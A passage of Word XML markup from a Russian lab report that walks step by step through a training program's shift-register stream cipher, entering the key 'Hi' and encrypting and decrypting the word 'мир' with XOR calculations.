        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Внизу в строке состояния появилось сообщение “Нажмите кнопку Следующий”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1. Нажата кнопка “Следующий”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2. Теперь необходимо ввести:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t>размер регистра, исходную строку, ключ шифрования, обратные связи в регистре.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Выбраны соответственно:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">9 разрядов (размер регистра), мир (исходная строка), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ключ шифрования), обратные связи в регистре.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3. Нажата кнопка “Результат”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4. Нажата кнопка “Следующий ”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>5. Теперь необходимо последовательно ввести ключ в регистр.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Нажата один раз кнопка “Ввод ключа”. В ключе синим цветом выделен первый бит. Используя значение выделенного бита в строке ключ и тех бит, которые располагаются в триггерах, имеющих обратные связи, вычисляется значение нового бита.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0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0 заносится в ячейку “Новый бит”. Нажимается кнопка ввод ключа. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Новый бит =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7. Новый бит = 0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8. Новый бит = 0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9. Новый бит = 0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10. Новый бит =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11. Новый бит =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0, → “Ввод ключа”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12. Новый бит =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 1, → “Ввод ключа”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13. Новый бит =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 1, → “Ввод ключа”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14. Новый бит =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0, → “Ввод ключа”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">15. Новый бит =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0, → “Ввод ключа”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">16. Новый бит = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0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17. Новый бит = 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0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18. Новый бит = 0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19. Новый бит =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0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 = 1, → “Ввод ключа”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>20. Нажата кнопка “Ввод ключа” появилось сообщение “Ключ введен”,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>→ “Ввод ключа”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>21. Нажать кнопку “Результат” и нажать кнопку “Зашифрование”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>22. Теперь необходимо зашифровать исходную строку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Используя значение тех бит, которые располагаются в триггерах, имеющих обратные связи, вычисляется значение нового бита.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 = 1.   1заносится в ячейку “Новый бит”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Также вычисляется “Выходной бит”. Этот бит вычисляется следующим образом: “Новый бит” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с текущим битом (выделенным синим цветом) в двоичном представлении исходной строки. 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 = 0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>0 заносится в ячейку “Выходной бит”. Нажата кнопка “Зашифрование”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">23. “Новый бит” =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24. “Новый бит” =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25.  Новый бит” =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0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 xml:space="preserve">26. “Новый бит” =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27. “Новый бит” =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28. “Новый бит” =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0 = 1, нажата кнопка “Зашифрование”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">29. “Новый бит” =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 xml:space="preserve">30. “Новый бит” =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31. “Новый бит” = 0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 0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“Выходной бит” = 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 = 1, нажата кнопка “Зашифрование”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">32. “Новый бит” =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33. “Новый бит” =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 xml:space="preserve">34. “Новый бит” = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0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35. “Новый бит” = 0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 xml:space="preserve">36. “Новый бит” = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0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 xml:space="preserve">37. “Новый бит” = 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0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0 = 1, нажата кнопка “Зашифрование”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">38. “Новый бит” = 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 = 0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“Выходной бит” = 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 = 1, нажата кнопка “Зашифрование”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">39. “Новый бит” = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 = 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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40. “Новый бит” = 0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0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41. “Новый бит” = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 = 0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“Выходной бит” = 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 = 1, нажата кнопка “Зашифрование”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">42. “Новый бит” =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0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 xml:space="preserve">43. “Новый бит” = 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0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0 = 1, нажата кнопка “Зашифрование”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">44. “Новый бит” = 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 = 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“Выходной бит” = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 = 1, нажата кнопка “Зашифрование”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">45. “Новый бит” = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0648">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0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46. Нажата кнопка “Зашифрование”. Появилось сообщение “Информация зашифрованна”. Нажата кнопка “Результат”. Появилось сообщение “Задание на зашифрование выполненно, приступим к расшифровке”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>47. Введен ключ “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”(Такой же, как и при зашифровании), в строку с исходной строкой введена информация, полученная в предыдущем задании (чтобы при расшифровании получилась исходная строка “мир”), размерность регистра и обратные связи выбраны такие же, как и в предыдущем задании. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>48. Нажата кнопка “Результат”, нажата кнопка “Следующий”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>49. Выполнение расшифрования (аналогично зашифрованию) побитно ввести ключ шифрования (выполняется также, как в пунктах 5 – 20).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>50.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:t>Побитно расшифровать исходную строку (см. пункты 22-47).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>51.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:t>Нажата кнопка “Результат”, появилось сообщение “Урок выполнен”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнение задания с оценкой является заключительным действием обучаемого с системой.</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pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
